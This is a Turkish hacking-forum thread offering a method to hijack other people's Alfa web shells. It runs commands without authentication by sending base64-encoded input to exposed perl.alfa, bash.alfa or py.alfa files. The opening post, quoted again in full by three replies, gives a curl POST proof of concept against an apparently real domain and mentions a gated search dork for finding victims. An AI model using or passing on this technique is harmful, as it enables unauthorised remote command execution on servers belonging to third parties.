Neler yeni

Exploit Alfa Shell 4.1 RCE | Kimlik Doğrulaması Yapmadan Shell Üzerinde Komut Çalıştırmak (CMD) (1 Viewer)

The_Fat 

what a tumblerful world
onursal
Mesajlar
101
Credits
135
Bu bi tık bir başkasının shell ine çökmek diyebiliriz.En popüler shell olan Alfa shell de RCE alabiliyoruz ve shell e giriş yapmadan komut çalıştırmamız mümkün hale geliyor.Yani şifreli falan olması bizim ipimizde değil :)


Tabi bunun için temel şartlar ;

# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa


... bu dosyalardan en az birini barındırıyor olması gerekiyor.Ve tabiki en yakın arkadaşımız terminal :(

kavram kanıtına geçmeden önce size bunu bulmanızı sağlayacak bir dork bırakıyorum
Hidden content
Bu içeriği görebilmeniz için bu konuya cevap vermeniz gerekmektedir.

Tamam varsayalım dorkumuzu kullanıp yukarıdaki dosyaları barındıran bi sayfayla karşılaştık burdan sonrası oldukça basit.Bunlardan herhangibiri üzerinde cmd parametresini kullanarak komut çalıştırmak için bir post isteği yapacağız.

[POC]
öncesinde cmd parametresi içerisinde çalışacak komutu base64 ile encode ediyorum

| ls -la
| base64 formatı : bHMgLWxh

ve curl ü kulllanarak post isteği yapıyorum:

Kod:
#$ curl -d "cmd=bHMgLWxh" -X POST http://benekonomistim.com/alfacgiapi/perl.alfa

ve vola işte bukadar ! gerisi sizin hayal gücünüze kalmış :)
 
Mesajlar
900
Credits
6,871
Bu bi tık bir başkasının shell ine çökmek diyebiliriz.En popüler shell olan Alfa shell de RCE alabiliyoruz ve shell e giriş yapmadan komut çalıştırmamız mümkün hale geliyor.Yani şifreli falan olması bizim ipimizde değil :)


Tabi bunun için temel şartlar ;

# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa


... bu dosyalardan en az birini barındırıyor olması gerekiyor.Ve tabiki en yakın arkadaşımız terminal :(

kavram kanıtına geçmeden önce size bunu bulmanızı sağlayacak bir dork bırakıyorum
[Hidden content]


Tamam varsayalım dorkumuzu kullanıp yukarıdaki dosyaları barındıran bi sayfayla karşılaştık burdan sonrası oldukça basit.Bunlardan herhangibiri üzerinde cmd parametresini kullanarak komut çalıştırmak için bir post isteği yapacağız.

[POC]
öncesinde cmd parametresi içerisinde çalışacak komutu base64 ile encode ediyorum

| ls -la
| base64 formatı : bHMgLWxh

ve curl ü kulllanarak post isteği yapıyorum:

Kod:
#$ curl -d "cmd=bHMgLWxh" -X POST http://benekonomistim.com/alfacgiapi/perl.alfa

ve vola işte bukadar ! gerisi sizin hayal gücünüze kalmış :)
Eline sağlık dostum
 

Th3columbia 

Depresif ve agresif
majorrr
Mesajlar
822
Credits
1,159
Bu bi tık bir başkasının shell ine çökmek diyebiliriz.En popüler shell olan Alfa shell de RCE alabiliyoruz ve shell e giriş yapmadan komut çalıştırmamız mümkün hale geliyor.Yani şifreli falan olması bizim ipimizde değil :)


Tabi bunun için temel şartlar ;

# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa


... bu dosyalardan en az birini barındırıyor olması gerekiyor.Ve tabiki en yakın arkadaşımız terminal :(

kavram kanıtına geçmeden önce size bunu bulmanızı sağlayacak bir dork bırakıyorum
[Hidden content]


Tamam varsayalım dorkumuzu kullanıp yukarıdaki dosyaları barındıran bi sayfayla karşılaştık burdan sonrası oldukça basit.Bunlardan herhangibiri üzerinde cmd parametresini kullanarak komut çalıştırmak için bir post isteği yapacağız.

[POC]
öncesinde cmd parametresi içerisinde çalışacak komutu base64 ile encode ediyorum

| ls -la
| base64 formatı : bHMgLWxh

ve curl ü kulllanarak post isteği yapıyorum:

Kod:
#$ curl -d "cmd=bHMgLWxh" -X POST http://benekonomistim.com/alfacgiapi/perl.alfa

ve vola işte bukadar ! gerisi sizin hayal gücünüze kalmış :)
Es
 

3stasyy

404 error
ez152
Mesajlar
159
Credits
0
Bu bi tık bir başkasının shell ine çökmek diyebiliriz.En popüler shell olan Alfa shell de RCE alabiliyoruz ve shell e giriş yapmadan komut çalıştırmamız mümkün hale geliyor.Yani şifreli falan olması bizim ipimizde değil :)


Tabi bunun için temel şartlar ;

# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa


... bu dosyalardan en az birini barındırıyor olması gerekiyor.Ve tabiki en yakın arkadaşımız terminal :(

kavram kanıtına geçmeden önce size bunu bulmanızı sağlayacak bir dork bırakıyorum
[Hidden content]


Tamam varsayalım dorkumuzu kullanıp yukarıdaki dosyaları barındıran bi sayfayla karşılaştık burdan sonrası oldukça basit.Bunlardan herhangibiri üzerinde cmd parametresini kullanarak komut çalıştırmak için bir post isteği yapacağız.

[POC]
öncesinde cmd parametresi içerisinde çalışacak komutu base64 ile encode ediyorum

| ls -la
| base64 formatı : bHMgLWxh

ve curl ü kulllanarak post isteği yapıyorum:

Kod:
#$ curl -d "cmd=bHMgLWxh" -X POST http://benekonomistim.com/alfacgiapi/perl.alfa

ve vola işte bukadar ! gerisi sizin hayal gücünüze kalmış :)
Obaa
 

Bu konuyu görüntüleyen kullanıcılar